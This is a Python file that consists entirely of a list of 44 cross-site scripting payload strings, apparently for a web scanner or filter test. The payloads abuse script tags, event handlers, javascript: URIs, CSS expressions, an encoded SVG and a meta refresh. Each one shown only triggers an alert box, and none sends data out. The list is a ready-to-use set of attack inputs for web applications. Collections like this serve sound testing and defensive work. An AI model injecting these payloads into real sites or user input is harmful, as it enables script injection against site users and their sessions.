xss_payloads = [
    "<a href=\"javascript:alert('XSS');\">Click me</a>",
    "<audio src=\"invalid.mp3\" onerror=\"alert('XSS');\"></audio>",
    "<b onmouseover=\"alert('XSS');\">Bold Text</b>",
    "<base href=\"javascript:alert('XSS');//\">",
    "<body background=\"javascript:alert('XSS')\">",
    "<body onload=\"alert('XSS');\">",
    "<button onclick=\"alert('XSS');\">Click me</button>",
    "<div onmouseover=\"alert('XSS');\">Hover me</div>",
    "<div style=\"background-image: url(javascript:alert('XSS'));\"></div>",
    "<div style=\"behavior: url(#default#userData);\"></div>",
    "<div style=\"width: expression(alert('XSS'));\"></div>",
    "<embed src=\"javascript:alert('XSS');\">",
    "<form action=\"javascript:alert('XSS');\"><input type=\"submit\"></form>",
    "<form><button formaction=\"javascript:alert('XSS');\">Submit</button></form>",
    "<iframe src=\"javascript:alert('XSS')\"></iframe>",
    "<iframe srcdoc=\"<script>alert('XSS')\"></iframe>",
    "<img src=\"data:image/svg+xml;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoJ1hTUycpPjwvc3ZnPg==\">",
    "<img src=\"http://invalid-url\" onerror=\"alert('XSS');\">",
    "<img src=\"javascript:alert('XSS');\">",
    "<img src=\"x\" onerror=\"alert('XSS');\">",
    "<input onblur=\"alert('XSS');\">",
    "<input type=\"hidden\" value=\"</script><script>alert('XSS');</script>\">",
    "<input type=\"text\" onfocus=\"alert('XSS');\">",
    "<link rel=\"stylesheet\" href=\"javascript:alert('XSS');\">",
    "<link rel=\"stylesheet\" type=\"text/css\" href=\"data:text/css,*{background:url('javascript:alert('XSS')')}\">",
    "<marquee onstart=\"alert('XSS');\">Start</marquee>",
    "<math><mtext><a xlink:href=\"javascript:alert('XSS');\">Click me</a></mtext></math>",
    "<meta charset=\"utf-7\"><script>alert('XSS');</script>",
    "<meta http-equiv=\"refresh\" content=\"0;url=javascript:alert('XSS');\">",
    "<object data=\"javascript:alert('XSS');\"></object>",
    "<p onmouseover=\"alert('XSS');\">Hover Paragraph</p>",
    "<plaintext><script>alert('XSS');</script>",
    "<script src=\"data:text/javascript,alert('XSS');\"></script>",
    "<script>alert('XSS');</script>",
    "<script>eval('alert(\\'XSS\\')');</script>",
    "<span onclick=\"alert('XSS');\">Click me</span>",
    "<style>@import 'javascript:alert('XSS');';</style>",
    "<svg/onload=alert('XSS')>",
    "<table background=\"javascript:alert('XSS')\">",
    "<table onmouseover=\"alert('XSS')\">",
    "<textarea onfocus=\"alert('XSS');\">Focus me</textarea>",
    "<ul onmouseover=\"alert('XSS');\">Hover List</ul>",
    "<video src=\"invalid.mp4\" onerror=\"alert('XSS');\"></video>",
    "<img src=x onerror/onclick=alert(\"nics113pt46202\")>"
]
